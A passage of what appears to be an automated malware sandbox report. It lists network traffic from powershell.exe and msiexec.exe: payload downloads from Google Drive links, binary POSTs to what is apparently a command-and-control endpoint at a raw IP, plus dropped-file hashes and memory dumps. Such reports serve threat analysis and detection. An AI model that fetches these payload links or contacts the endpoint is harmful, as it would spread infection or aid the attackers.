X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 468128
    Last-Modified: Mon, 30 Sep 2024 03:52:44 GMT
    X-GUploader-UploadID: AD-8ljtZrQz1Kvswpd3FRMsM1vbqS2KKmFwOPGn7QEXs5ekP2G7Q4-IxP57ssnZ7kcD_vHEX1A4
    Date: Mon, 30 Sep 2024 20:57:14 GMT
    Expires: Mon, 30 Sep 2024 20:57:14 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=7/JiXg==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt
    msiexec.exe
    Remote address:
    142.250.187.206:443
    Request
    GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Sep 2024 20:57:38 GMT
    Location: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-FGqKbytJ9zfexo4kEAxuEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    c.pki.goog
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    216.58.204.67
  • flag-gb
    GET
    http://c.pki.goog/r/r1.crl
    msiexec.exe
    Remote address:
    216.58.204.67:80
    Request
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 854
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Mon, 30 Sep 2024 20:19:21 GMT
    Expires: Mon, 30 Sep 2024 21:09:21 GMT
    Cache-Control: public, max-age=3000
    Age: 2297
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • flag-us
    DNS
    o.pki.goog
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    o.pki.goog
    IN A
    Response
    o.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.187.227
  • flag-gb
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDmcMw%2Fo03sIxABiVt5eEgl
    msiexec.exe
    Remote address:
    142.250.187.227:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDmcMw%2Fo03sIxABiVt5eEgl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Mon, 30 Sep 2024 20:30:01 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 1657
  • flag-gb
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz
    msiexec.exe
    Remote address:
    142.250.187.227:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Mon, 30 Sep 2024 20:55:12 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 146
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
    msiexec.exe
    Remote address:
    142.250.179.225:443
    Request
    GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="sLgRDOfJZMJPu27.bin"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 106560
    Last-Modified: Mon, 30 Sep 2024 03:50:27 GMT
    X-GUploader-UploadID: AD-8ljtzvES8sKQIbz8CLAbI683tqwCKBBGC3gsLqqPBr5yecKf7inymVedgEuAPvH91i5XAltU
    Date: Mon, 30 Sep 2024 20:57:42 GMT
    Expires: Mon, 30 Sep 2024 20:57:42 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=p83L0w==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    POST
    http://137.184.191.215/index.php/check.php?s=am9ntjjw
    msiexec.exe
    Remote address:
    137.184.191.215:80
    Request
    POST /index.php/check.php?s=am9ntjjw HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 137.184.191.215
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 1A0CD362
    Content-Length: 374
    Connection: close
    Response
    HTTP/1.0 500 Internal Server Error
    Date: Mon, 30 Sep 2024 20:57:43 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Content-Length: 2557
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    POST
    http://137.184.191.215/index.php/check.php?s=am9ntjjw
    msiexec.exe
    Remote address:
    137.184.191.215:80
    Request
    POST /index.php/check.php?s=am9ntjjw HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 137.184.191.215
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 1A0CD362
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.0 500 Internal Server Error
    Date: Mon, 30 Sep 2024 20:57:45 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Content-Length: 2557
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    POST
    http://137.184.191.215/index.php/check.php?s=am9ntjjw
    msiexec.exe
    Remote address:
    137.184.191.215:80
    Request
    POST /index.php/check.php?s=am9ntjjw HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 137.184.191.215
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 1A0CD362
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.0 500 Internal Server Error
    Date: Mon, 30 Sep 2024 20:57:48 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Content-Length: 2557
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    POST
    http://137.184.191.215/index.php/check.php?s=am9ntjjw
    msiexec.exe
    Remote address:
    137.184.191.215:80
    Request
    POST /index.php/check.php?s=am9ntjjw HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 137.184.191.215
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 1A0CD362
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.0 500 Internal Server Error
    Date: Mon, 30 Sep 2024 20:58:51 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Content-Length: 2557
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • 142.250.187.206:443
    https://drive.google.com/uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7
    tls, http
    powershell.exe
    901 B
     8.7kB
     9
    11

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7

    HTTP Response

    303
  • 142.250.179.225:443
    https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
    tls, http
    powershell.exe
    9.3kB
     504.3kB
     192
    372

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download

    HTTP Response

    200
  • 142.250.187.206:443
    https://drive.google.com/uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt
    tls, http
    msiexec.exe
    1.1kB
     8.8kB
     12
    13

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt

    HTTP Response

    303
  • 216.58.204.67:80
    http://c.pki.goog/r/r1.crl
    http
    msiexec.exe
    348 B
     1.7kB
     5
    4

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    200
  • 142.250.187.227:80
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz
    http
    msiexec.exe
    888 B
     3.1kB
     9
    6

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDmcMw%2Fo03sIxABiVt5eEgl

    HTTP Response

    200

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDbEwnphZvrGArz%2BV5lisDz

    HTTP Response

    200
  • 142.250.179.225:443
    https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
    tls, http
    msiexec.exe
    3.0kB
     122.0kB
     52
    94

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download

    HTTP Response

    200
  • 137.184.191.215:80
    http://137.184.191.215/index.php/check.php?s=am9ntjjw
    http
    msiexec.exe
    948 B
     3.1kB
     7
    7

    HTTP Request

    POST http://137.184.191.215/index.php/check.php?s=am9ntjjw

    HTTP Response

    500
  • 137.184.191.215:80
    http://137.184.191.215/index.php/check.php?s=am9ntjjw
    http
    msiexec.exe
    750 B
     3.1kB
     7
    7

    HTTP Request

    POST http://137.184.191.215/index.php/check.php?s=am9ntjjw

    HTTP Response

    500
  • 137.184.191.215:80
    http://137.184.191.215/index.php/check.php?s=am9ntjjw
    http
    msiexec.exe
    727 B
     3.1kB
     7
    7

    HTTP Request

    POST http://137.184.191.215/index.php/check.php?s=am9ntjjw

    HTTP Response

    500
  • 137.184.191.215:80
    http://137.184.191.215/index.php/check.php?s=am9ntjjw
    http
    msiexec.exe
    727 B
     3.1kB
     7
    7

    HTTP Request

    POST http://137.184.191.215/index.php/check.php?s=am9ntjjw

    HTTP Response

    500
  • 8.8.8.8:53
    drive.google.com
    dns
    msiexec.exe
    62 B
     78 B
     1
    1

    DNS Request

    drive.google.com

    DNS Response

    142.250.187.206

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    msiexec.exe
    74 B
     90 B
     1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    142.250.179.225

  • 8.8.8.8:53
    c.pki.goog
    dns
    msiexec.exe
    56 B
     107 B
     1
    1

    DNS Request

    c.pki.goog

    DNS Response

    216.58.204.67

  • 8.8.8.8:53
    o.pki.goog
    dns
    msiexec.exe
    56 B
     107 B
     1
    1

    DNS Request

    o.pki.goog

    DNS Response

    142.250.187.227

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\550541LN0L90N852ZT4E.temp
    Filesize

    7KB

    MD5

    0c498717cdacdc8aec17050ab8590bd6

    SHA1

    8d584c7aadf8f2ec6040a4ab9e6519557126b6f7

    SHA256

    fe2821979ded1a8d949090c225b9f2e4ab6c5f821269acb7b7cf47c45e7263df

    SHA512

    30bb087bf5ef3125aa4b2072e12619d59a776f3b22d859631ea5516a47def40e8cf33f353b4267bc6422b1e82633922378ef77fe84cdf932ee7dcf800d5b1823

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Reebok.Dia
    Filesize

    457KB

    MD5

    d4c256a39ebb62a0ae88c5dfaf3de765

    SHA1

    437d4efb2d6f5650f9927cc930b6a34aa46e3a54

    SHA256

    6244fb691d281b1c43c443e20b1deb12e3a4f85e45993d37c97b9c968977d1b4

    SHA512

    6a2240302a45c0f32b6ef44e21fc577e2b1908136568bbcc3112f35341c48d00a7938292483ff5bbbc20f2638528955e73a4baf5d4fe3cf9d4175bc010ff401f

    Download Submit

  • memory/860-17-0x00000000067D0000-0x0000000007A01000-memory.dmp

    Filesize

    18.2MB

    Download

  • memory/2616-40-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2616-39-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2888-7-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-13-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-10-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-9-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-8-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-4-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2888-6-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2888-5-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.